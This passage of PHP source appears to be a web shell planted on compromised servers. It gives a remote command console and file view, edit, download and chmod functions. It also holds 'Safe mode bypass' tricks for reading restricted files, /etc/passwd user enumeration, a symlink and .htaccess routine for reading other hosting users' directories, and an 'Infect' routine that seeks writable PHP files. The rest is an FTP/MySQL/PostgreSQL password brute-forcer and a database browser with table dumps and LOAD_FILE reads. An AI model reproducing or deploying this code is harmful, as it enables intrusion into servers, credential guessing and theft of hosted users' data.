540 $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'bin2hex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', );
541 if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
542 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);
543}else{g(null,null,this.selectTool.value,this.input.value);
544} return false;
545'><select name='selectTool'>";
546 foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
547 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;
548':'')."margin-top:5px' id='strOutput'>";
549 if(!empty($_POST['p1'])) { if(function_exists($_POST['p1'])) echo htmlspecialchars($_POST['p1']($_POST['p2']));
550 } echo"</pre></div>";
551 
552?>
553	<br><h1>Search for hash:</h1><div class=content>
554		<form method='post' target='_blank' name="hf">
555			<input type="text" name="hash" style="width:200px;
556"><br>
557			<input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';
558document.hf.submit()"><br>
559			<input type="button" value="fakenamegenerator.com" onclick="document.hf.action='http://www.fakenamegenerator.com/';
560document.hf.submit()"><br>
561			<input type="button" value="tools4noobs.com" onclick="document.hf.action='http://www.tools4noobs.com/online_php_functions/';
562document.hf.submit()"><br>
563			<input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';
564document.hf.submit()"><br>
565			<input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';
566document.hf.submit()"><br>
567		</form>
568	</div>
569	
570<?php printFooter();
571 } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']);
572 if(@$_POST['p2']=='download') { if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096);
573 header("Content-Disposition: attachment;
574 filename=".basename($_POST['p1']));
575 if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']);
576 header("Content-Type: ".$type);
577 } $fp = @fopen($_POST['p1'], "r");
578 if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);
579 fclose($fp);
580 } } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { } exit;
581 } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w');
582 if($fp) { $_POST['p2'] = "edit";
583 fclose($fp);
584 } } } printHeader();
585 echo '<h1>File tools</h1><div class=content>';
586 if( !file_exists(@$_POST['p1']) ) { echo 'File not exists';
587 printFooter();
588 return;
589 } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
590 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
591 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
592 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
593 if( empty($_POST['p2']) ) $_POST['p2'] = 'view';
594 if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
595 else $m = array('Chmod', 'Rename', 'Touch');
596 foreach($m as $v) echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
597 echo '<br><br>';
598 switch($_POST['p2']) { case 'view': echo '<pre class=ml1>';
599 $fp = @fopen($_POST['p1'], 'r');
600 if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));
601 @fclose($fp);
602 } echo '</pre>';
603 break;
604 case 'highlight': if( is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;
605color:black;
606">';
607 $code = highlight_file($_POST['p1'],true);
608 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
609 } break;
610 case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0;
611 for($i=strlen($_POST['p3'])-1;
612$i>=0;
613--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
614 if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";
615</script>';
616 else die('<script>g(null,null,null,null,"")</script>');
617 } echo '<form onsubmit="g(null,null,null,null,this.chmod.value);
618return false;
619"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
620 break;
621 case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable';
622 break;
623 } if( !empty($_POST['p3']) ) { @file_put_contents($_POST['p1'],$_POST['p3']);
624 echo 'Saved!<br><script>document.mf.p3.value="";
625</script>';
626 } echo '<form onsubmit="g(null,null,null,null,this.text.value);
627return false;
628"><textarea name=text class=bigarea>';
629 $fp = @fopen($_POST['p1'], 'r');
630 if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));
631 @fclose($fp);
632 } echo '</textarea><input type=submit value=">>"></form>';
633 break;
634 case 'hexdump': $c = @file_get_contents($_POST['p1']);
635 $n = 0;
636 $h = array('00000000<br>','','');
637 $len = strlen($c);
638 for ($i=0;
639 $i<$len;
640 ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' ';
641 switch ( ord($c[$i]) ) { case 0: $h[2] .= ' ';
642 break;
643 case 9: $h[2] .= ' ';
644 break;
645 case 10: $h[2] .= ' ';
646 break;
647 case 13: $h[2] .= ' ';
648 break;
649 default: $h[2] .= $c[$i];
650 break;
651 } $n++;
652 if ($n == 32) { $n = 0;
653 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';
654} $h[1] .= '<br>';
655 $h[2] .= "\n";
656 } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;
657"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
658 break;
659 case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br><script>document.mf.p3.value="";
660</script>';
661 else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
662 } echo '<form onsubmit="g(null,null,null,null,this.name.value);
663return false;
664"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
665 break;
666 case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']);
667 if($time) { if(@touch($_POST['p1'],$time,$time)) die('<script>g(null,null,null,null,"")</script>');
668 else { echo 'Fail!<script>document.mf.p3.value="";
669</script>';
670 } } else echo 'Bad time format!<script>document.mf.p3.value="";
671</script>';
672 } echo '<form onsubmit="g(null,null,null,null,this.touch.value);
673return false;
674"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
675 break;
676 case 'mkfile': break;
677 } echo '</div>';
678 printFooter();
679 } function actionSafeMode() { $temp='';
680 ob_start();
681 switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx');
682 if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp);
683 unlink($temp);
684 } else echo 'Sorry... Can\'t open file';
685 break;
686 case 2: $files = glob($_POST['p2'].'*');
687 if( is_array($files) ) foreach ($files as $filename) echo $filename."\n";
688 break;
689 case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
690 curl_exec($ch);
691 break;
692 case 4: ini_restore("safe_mode");
693 ini_restore("open_basedir");
694 include($_POST['p2']);
695 break;
696 case 5: for(;
697$_POST['p2'] <= $_POST['p3'];
698$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']);
699 if ($uid) echo join(':',$uid)."\n";
700 } break;
701 case 6: if(!function_exists('imap_open'))break;
702 $stream = imap_open($_POST['p2'], "", "");
703 if ($stream == FALSE) break;
704 echo imap_body($stream, 1);
705 imap_close($stream);
706 break;
707 } $temp = ob_get_clean();
708 printHeader();
709 echo '<h1>Safe mode bypass</h1><div class=content>';
710 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);
711return false;
712\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);
713return false;
714\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);
715return false;
716\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);
717return false;
718\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);
719return false;
720\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);
721return false;
722\'><input type=text name=param><input type=submit value=">>"></form>';
723 if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
724 echo '</div>';
725 printFooter();
726 } function actionConsole() { if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
727 ob_start();
728 echo "document.cf.cmd.value='';
729\n";
730 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
731 if(preg_match("!.*cd\s+([^;
732]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd();
733 echo "document.mf.c.value='".$GLOBALS['cwd']."';
734";
735 } } echo "document.cf.output.value+='".$temp."';
736";
737 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;
738";
739 $temp = ob_get_clean();
740 echo strlen($temp), "\n", $temp;
741 exit;
742 } printHeader();
743 
744?>
745<script>
746if(window.Event) window.captureEvents(Event.KEYDOWN);
747var cmds = new Array("");
748var cur = 0;
749function kp(e) {
750	var n = (window.Event) ? e.which : e.keyCode;
751	if(n == 38) {
752		cur--;
753		if(cur>=0)
754			document.cf.cmd.value = cmds[cur];
755		else
756			cur++;
757	} else if(n == 40) {
758		cur++;
759		if(cur < cmds.length)
760			document.cf.cmd.value = cmds[cur];
761		else
762			cur--;
763	}
764}
765function add(cmd) {
766	cmds.pop();
767	cmds.push(cmd);
768	cmds.push("");
769	cur = cmds.length-1;
770}
771</script>
772
773<?php echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';
774document.cf.cmd.value=\'\';
775return false;
776}add(this.cmd.value);
777if(this.ajax.checked){a(null,null,this.cmd.value);
778}else{g(null,null,this.cmd.value);
779} return false;
780"><select name=alias>';
781 foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
782 continue;
783 } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
784 } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
785 echo '</select><input type=button onclick="add(document.cf.alias.value);
786if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);
787}else{g(null,null,document.cf.alias.value);
788}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;
789margin:0;
790" readonly>';
791 if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
792 } echo '</textarea><input type=text name=cmd style="border-top:0;
793width:100%;
794margin:0;
795" onkeydown="kp(event);
796">';
797 echo '</form></div><script>document.cf.cmd.focus();
798</script>';
799 printFooter();
800 } function actionLogout() { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
801 echo 'bye!';
802 } function actionSelfRemove() { printHeader();
803 if($_POST['p1'] == 'yes') { if(@unlink(SELF_PATH)) die('Shell has been removed');
804 else echo 'unlink error!';
805 } echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
806 printFooter();
807 } function actionTools() { printHeader();
808 printFooter();
809 } function actionDomains() { printHeader();
810 error_reporting(0);
811 echo "<title>#Domains & Users</title>";
812 mkdir("sym");
813 symlink("/","0/x.txt");
814 $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
815 $f = fopen ('sym/.htaccess','w');
816 fwrite($f , $c);
817 $d0mains = @file("/etc/named.conf");
818 if(!$d0mains){ die("<b>#Error... -> [ /etc/named.conf ]");
819 } echo "<table align=center border=1>
820<tr bgcolor=teal><td>Domain</td><td>User List </td><td>Symlink</td></tr>";
821 foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);
822 flush();
823 if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
824 echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td><td><a href='sym/x.txt/home/".$user['name']."/public_html'>Miremos</a></td></tr>";
825 flush();
826 }}} echo "</table> 
827<p align='center'> 
828FailRoot'Cod3rz <a href='http://failroot.wordpress.com/'>FailRoot-Sec.Com</a> | <a 
829href='http://wWw.sEc4EvEr.CoM/'>wWw.sEc4EvEr.CoM</a><br> 
830</p> 
831";
832 printFooter();
833 } function actionInfect() { printHeader();
834 echo '<h1>Infect</h1><div class=content>';
835 if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT'];
836 function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array();
837 $inner_files = Array();
838 while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file);
839 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
840 } else { array_push($files, $dir . "/" . $file);
841 } } } closedir($dh);
842 return $files;
843 } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4);
844 if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>";
845 $i++;
846 } } } echo "<font color=red size=14>$i</font>";
847 }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>";
848 echo 'Really want to infect the server?&nbsp;
849<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
850 } printFooter();
851 } function actionBruteforce() { printHeader();
852 if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
853 if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21);
854 if(!$fp) return false;
855 $res = @ftp_login($fp, $login, $pass);
856 @ftp_close($fp);
857 return $res;
858 } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
859 @mysql_close($res);
860 return $res;
861 } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
862 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
863 @pg_close($res);
864 return $res;
865 } } $success = 0;
866 $attempts = 0;
867 $server = explode(":", $_POST['server']);
868 if($_POST['type'] == 1) { $temp = @file('/etc/passwd');
869 if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line);
870 ++$attempts;
871 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++;
872 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
873 } if(@$_POST['reverse']) { $tmp = "";
874 for($i=strlen($line[0])-1;
875 $i>=0;
876 --$i) $tmp .= $line[0][$i];
877 ++$attempts;
878 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++;
879 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
880 } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']);
881 if( is_array($temp) ) foreach($temp as $line) { $line = trim($line);
882 ++$attempts;
883 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++;
884 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
885 } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
886 } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
887 echo '</div><br>';
888 printFooter();
889 } function actionSql() { class DbClass { var $type;
890 var $link;
891 var $res;
892 function DbClass($type) { $this->type = $type;
893 } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
894 break;
895 case 'pgsql': $host = explode(':', $host);
896 if(!$host[1]) $host[1]=5432;
897 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
898 break;
899 } return false;
900 } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true;
901 break;
902 } return false;
903 } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str);
904 break;
905 case 'pgsql': return $this->res = @pg_query($this->link,$str);
906 break;
907 } return false;
908 } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;
909 switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res);
910 break;
911 case 'pgsql': return @pg_fetch_assoc($res);
912 break;
913 } return false;
914 } function listDbs() { switch($this->type) { case 'mysql': return $this->res = @mysql_list_dbs($this->link);
915 break;
916 case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database");
917 break;
918 } return false;
919 } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES');
920 break;
921 case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
922 break;
923 } return false;
924 } function error() { switch($this->type) { case 'mysql': return @mysql_error($this->link);
925 break;
926 case 'pgsql': return @pg_last_error($this->link);
927 break;
928 } return false;
929 } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link);
930 else $this->query('SET CHARSET '.$str);
931 break;
932 case 'mysql': return @pg_set_client_encoding($this->link, $str);
933 break;
934 } return false;
935 } function dump($table) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
936 $create = mysql_fetch_array($res);
937 echo $create[1].";
938\n\n";
939 $this->query('SELECT * FROM `'.$table.'`');
940 while($item = $this->fetch()) { $columns = array();
941 foreach($item as $k=>$v) { $item[$k] = "'".@mysql_real_escape_string($v)."'";
942 $columns[] = "`".$k."`";
943 } echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');
944'."\n";
945 } break;
946 case 'pgsql': $this->query('SELECT * FROM '.$table);
947 while($item = $this->fetch()) { $columns = array();
948 foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'";
949 $columns[] = $k;
950 } echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');
951'."\n";
952 } break;
953 } return false;
954 } };
955 $db = new DbClass($_POST['type']);
956 if(@$_POST['p2']=='download') { ob_start("ob_gzhandler", 4096);
957 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
958 $db->selectdb($_POST['sql_base']);
959 header("Content-Disposition: attachment;
960 filename=dump.sql");
961 header("Content-Type: text/plain");
962 foreach($_POST['tbl'] as $v) $db->dump($v);
963 exit;
964 } printHeader();
965 
966?>
967	<h1>Sql browser</h1><div class=content>
968	<form name="sf" method="post">
969		<table cellpadding="2" cellspacing="0">
970			<tr>
971				<td>Type</td>
972				<td>Host</td>
973				<td>Login</td>
974				<td>Password</td>
975				<td>Database</td>
976				<td></td>
977			</tr>
978			<tr>
979				<input type=hidden name=a value=Sql>
980				<input type=hidden name=p1 value='query'>
981				<input type=hidden name=p2>
982				<input type=hidden name=c value='
983<?php echo htmlspecialchars($GLOBALS['cwd']);
984
985?>'>
986				<input type=hidden name=charset value='
987<?php echo isset($_POST['charset'])?$_POST['charset']:''
988?>'>
989				<td>
990					<select name='type'>
991						<option value="mysql" 
992<?php if(@$_POST['type']=='mysql')echo 'selected';
993
994?>>MySql</option>
995						<option value="pgsql" 
996<?php if(@$_POST['type']=='pgsql')echo 'selected';
997
998?>>PostgreSql</option>
999					</select></td>
1000				<td><input type=text name=sql_host value='
1001<?php echo (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));
1002
1003?>'></td>
1004				<td><input type=text name=sql_login value='
1005<?php echo (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));
1006
1007?>'></td>
1008				<td><input type=text name=sql_pass value='
1009<?php echo (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));
1010
1011?>'></td>
1012				<td>
1013	
1014<?php $tmp = "<input type=text name=sql_base value=''>";
1015 if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251');
1016 break;
1017 case "UTF-8": $db->setCharset('utf8');
1018 break;
1019 case "KOI8-R": $db->setCharset('koi8r');
1020 break;
1021 case "KOI8-U": $db->setCharset('koi8u');
1022 break;
1023 case "cp866": $db->setCharset('cp866');
1024 break;
1025 } $db->listDbs();
1026 echo "<select name=sql_base><option value=''></option>";
1027 while($item = $db->fetch()) { list($key, $value) = each($item);
1028 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1029 } echo '</select>';
1030 } else echo $tmp;
1031 }else echo $tmp;
1032 
1033?></td>
1034				<td><input type=submit value=">>"></td>
1035			</tr>
1036		</table>
1037		<script>
1038			function st(t,l) {
1039				document.sf.p1.value = 'select';
1040				document.sf.p2.value = t;
1041				if(l!=null)document.sf.p3.value = l;
1042				document.sf.submit();
1043			}
1044			function is() {
1045				for(i=0;
1046i<document.sf.elements['tbl[]'].length;
1047++i)
1048					document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
1049			}
1050		</script>
1051	
1052<?php if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1053 if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']);
1054 echo "<tr><td width=1 style='border-top:2px solid #666;
1055border-right:2px solid #666;
1056'><span>Tables:</span><br><br>";
1057 $tbls_res = $db->listTables();
1058 while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);
1059 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1060 $value = htmlspecialchars($value);
1061 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;
1062<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1063 } echo "<input type='checkbox' onclick='is();
1064'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";
1065document.sf.submit();
1066'></td><td style='border-top:2px solid #666;
1067'>";
1068 if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query';
1069 $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
1070 $num = $db->fetch();
1071 $num = $num['n'];
1072 echo "<span>".$_POST['p2']."</span> ($num) ";
1073 for($i=0;
1074$i<($num/30);
1075$i++) if($i != (int)$_POST['p3']) echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
1076 else echo ($i+1)," ";
1077 if($_POST['type']=='pgsql') $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1078 else $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1079 echo "<br><br>";
1080 } if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { $db->query(@$_POST['p3']);
1081 if($db->res !== false) { $title = false;
1082 echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
1083 $line = 1;
1084 while($item = $db->fetch()) { if(!$title) { echo '<tr>';
1085 foreach($item as $key => $value) echo '<th>'.$key.'</th>';
1086 reset($item);
1087 $title=true;
1088 echo '</tr><tr>';
1089 $line = 2;
1090 } echo '<tr class="l'.$line.'">';
1091 $line = $line==1?2:1;
1092 foreach($item as $key => $value) { if($value == null) echo '<td><i>null</i></td>';
1093 else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1094 } echo '</tr>';
1095 } echo '</table>';
1096 } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1097 } } echo "<br><textarea name='p3' style='width:100%;
1098height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
1099 echo "</td></tr>";
1100 } echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";
1101document.sf.p2.value=this.f.value;
1102document.sf.submit();
1103return false;
1104'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1105 if(@$_POST['p1'] == 'loadfile') { $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
1106 $file = $db->fetch();
1107 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1108 } } echo '</div>';
1109 printFooter();
1110 } function actionNetwork() { printHeader();
